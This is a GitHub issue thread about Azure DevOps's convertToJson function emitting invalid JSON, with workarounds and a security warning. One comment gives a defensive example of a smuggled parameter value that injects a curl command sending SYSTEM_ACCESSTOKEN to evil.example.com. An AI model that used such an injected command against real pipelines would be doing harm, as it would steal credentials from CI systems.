### ISSUE TITLE
Output of `convertToJson` funtion is not using valid JSON syntax

### ISSUE THREAD

**Issue by dingliu** [MicrosoftDocs/azure-devops-docs#11983]
In Azure DevOps pipeline, expression function [`convertToJson`](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/expressions?view=azure-devops#converttojson) is documented as:

> Take a complex object and outputs it as JSON.

However, the output of this function is not using valid JSON syntax, because:

- The property names (or keys) are not double quoted
- The string values are not double quoted

To demonstrate this issue, trying to parse the example output either using [`jq`](https://stedolan.github.io/jq/) under bash or [`ConvertFrom-Json`](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/convertfrom-json?view=powershell-7.2) under PowerShell will both fail:

![image](https://user-images.githubusercontent.com/888873/154558877-386e4679-4988-45b0-b617-de8db6e009a0.png)

![image](https://user-images.githubusercontent.com/888873/154558918-14227ec9-721d-484a-a483-bbe6a6c321ed.png)

![image](https://user-images.githubusercontent.com/888873/154558950-c0bc03aa-d8e6-4eb7-8b91-f7f504be710b.png)

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 77c58a78-a567-e99a-9eb7-62dddd1b90b6
* Version Independent ID: 680a79bc-11de-39fc-43e3-e07dc762db18
* Content: [Expressions - Azure Pipelines](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/expressions?view=azure-devops#converttojson)
* Content Source: [docs/pipelines/process/expressions.md](https://github.com/MicrosoftDocs/azure-devops-docs/blob/main/docs/pipelines/process/expressions.md)
* Product: **devops**
* Technology: **devops-cicd-process**
* GitHub Login: @juliakm
* Microsoft Alias: **jukullam**

**Comment by dingliu** [comment]
Although there is [a workaround on StackOverflow](https://stackoverflow.com/questions/57264556/prevent-quotes-from-disappearing-in-json-in-between-azure-devops-tasks/70967584#70967584), it still would be great if `convertToJson` function can fulfill it's purpose by generating a valid JSON output.

**Comment by WilliamAntonRohm** [comment]
@dingliu -- Ding, thank you for your feedback.  This repo is solely for documentation issues, and this issue is product-related. To make sure it gets in front of the right people, [please add it here](https://developercommunity.visualstudio.com/search?space=21).

I am closing this issue now.  You are welcome to @ mention me for any followup.  We hope to hear from you again.

**Comment by dciborow** [comment]
@WilliamAntonRohm ,

Can we at least update the doc with an example of how to properly output a json into bash? The example here prints a "not" json into bash.
https://docs.microsoft.com/en-us/azure/devops/pipelines/process/expressions?view=azure-devops#converttojson

We have a stack overflow post about people trying to figure out how to do this over here. 
https://stackoverflow.com/questions/57264556/prevent-quotes-from-disappearing-in-json-in-between-azure-devops-tasks/70967584?noredirect=1#comment125795408_70967584

A command like this will work. It is not nice to look at, but it is right example to provide for Bash. 
```
echo "${{ convertToJson(parameters.listOfValues) }}" | \
  sed -e 's/^  /  "/g' | \
  sed -e 's/: /": "/g' | \
  sed -e 's/,$/",/g' | \
  sed -e 's/"}/}/g' | \
  sed -e 's/}"/}/g' | \
  sed -e 's/"{/{/g' | \
  sed -e 's/\([a-zA-Z0-9]\)$/\1"/g'
```

![image](https://user-images.githubusercontent.com/9027725/154996257-d263ca65-db2b-41cc-b98f-934ce7f99c5e.png)
This example is unusable.

**Comment by dciborow** [comment]
#11991

**Comment by dingliu** [comment]
@dciborow I notice that it could be quotation mark of the `script` (or `bash`) task that caused this issue.

Using double quotes in `echo` command

```
steps:
- script: |
    echo "${{ convertToJson(parameters.listOfValues) }}"
```

generates

![image](https://user-images.githubusercontent.com/888873/156213258-df021184-bb05-41a9-abc4-b8281359cab4.png)

While using single quotes 

```
steps:
- script: |
    echo '${{ convertToJson(parameters.listOfValues) }}'
```

generates:

![image](https://user-images.githubusercontent.com/888873/156213629-4a234f32-f703-4ad9-80b3-d0e20e6e3944.png)

**Comment by Woody88** [comment]
> @dciborow I notice that it could be quotation mark of the `script` (or `bash`) task that caused this issue.
> 
> Using double quotes in `echo` command
> 
> ```
> steps:
> - script: |
>     echo "${{ convertToJson(parameters.listOfValues) }}"
> ```
> 
> generates
> 
> ![image](https://user-images.githubusercontent.com/888873/156213258-df021184-bb05-41a9-abc4-b8281359cab4.png)
> 
> While using single quotes
> 
> ```
> steps:
> - script: |
>     echo '${{ convertToJson(parameters.listOfValues) }}'
> ```
> 
> generates:
> 
> ![image](https://user-images.githubusercontent.com/888873/156213629-4a234f32-f703-4ad9-80b3-d0e20e6e3944.png)


This also worked for me. It should get fixed or at least documented.

**Comment by SimonAlling** [comment]
> @dciborow I notice that it could be quotation mark of the `script` (or `bash`) task that caused this issue.
>
> While using single quotes
> 
> ```
> steps:
> - script: |
>     echo '${{ convertToJson(parameters.listOfValues) }}'
> ```

**Note that using single quotes is not a solution** – it just happens to work _more often_ than double quotes, because the latter are more common in JSON. But the core problem is still exactly the same: **using arbitrary text as part of the _source code_ of a program**. Whoever creates that arbitrary text is essentially given full control over the meaning of the program. For example, the template containing the step above could be included like this:

```yaml
- template: /path/to/the-template.yml
  parameters:
    listOfValues:
      foo: |-
        '; curl --data ${SYSTEM_ACCESSTOKEN} http://evil.example.com; echo '
```

Then you end up constructing and running this script:

```bash
echo ''; curl --data ${SYSTEM_ACCESSTOKEN} http://evil.example.com; echo ''
```

And – as we can see in this thread and in [the mentioned StackOverflow thread](https://stackoverflow.com/questions/57264556/prevent-quotes-from-disappearing-in-json-in-between-azure-devops-tasks) – even if the data is trusted, one still has to deal with extremely complicated `sed` workarounds, nasty special cases etc etc … the pain never ends.

**A much better way is to store the output of `convertToJson` in an environment variable instead:**

```yaml
- script: |
    echo "${THE_JSON}" | jq .
  env:
    THE_JSON: ${{ convertToJson(parameters.listOfValues) }}
```

Then one doesn't have to worry about quotation marks, escaping special characters, code injection exploits or anything. (Please refer to [my StackOverflow answer](https://stackoverflow.com/a/72216579/2135002) for more details.)

**⚠️ Never use arbitrary text – especially not from an external source – as part of the raw _source code_ of a program without a _really_ good reason.**

The example in the official documentation should _definitely_ be updated, as it is error-prone, unsecure, and not successful in demonstrating that `convertToJson` actually does output JSON.
